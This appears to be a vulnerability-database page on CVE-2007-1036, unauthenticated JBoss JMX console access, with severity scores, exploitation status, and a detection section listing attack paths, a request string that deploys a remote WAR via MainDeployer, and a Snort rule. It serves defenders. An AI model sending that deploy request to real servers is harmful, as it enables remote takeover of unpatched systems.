cbcvebase.
CVE-2007-1036
published 2007-02-21

CVE-2007-1036: The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass…

PriorityP187high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVRansomware
Exploited in the wild
EPSS
81.83%
99.6th percentile
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.

Affected

2 ranges
VendorProductVersion rangeFixed in
hpprocurve_manager
hpprocurve_manager

Detection & IOCsextracted from sources · hover to see the quote

path/jmx-console/HtmlAdaptor
path/jmx-console
path/invoker/JMXInvokerServlet
port8080
path/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
commandaction=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>
otherContent-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
  • Detect unauthenticated POST requests to /jmx-console/HtmlAdaptor with 'invokeOpByName' and 'MainDeployer' parameters, indicating WAR deployment via JMX Console.
  • Detect POST requests to /invoker/JMXInvokerServlet with Content-Type 'application/x-java-serialized-object' — indicates JMXInvokerServlet abuse for unauthenticated WAR deployment.
  • Monitor for HTTP requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo — used by attackers for automated platform fingerprinting prior to exploitation.
  • Alert on HTTP verbs other than GET or POST (e.g., HEAD) targeting /jmx-console/HtmlAdaptor, as the exploit supports non-standard verbs to bypass authentication filters (CVE-2010-0738 chaining).
  • Check for JBoss version strings 'CVSTag=Branch_4_', 'SVNTag=JBoss_4_', or 'SVNTag=JBoss_5_' in HTTP responses to /invoker/JMXInvokerServlet — these indicate vulnerable JBoss 4.x/5.x targets.
  • ·The exploit only works if the target JBoss server can make outbound HTTP connections back to the attacker (for WAR retrieval via MainDeployer). Egress filtering will block this attack vector.
  • ·The DeploymentFileRepository-based attack path (via JMXInvokerServlet) is only applicable to JBoss 4.x and 5.x.
  • ·The vulnerability stems from default JBoss configuration leaving the console and web management interfaces unauthenticated; securing these interfaces per the JBoss Application Server Guide mitigates the risk.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.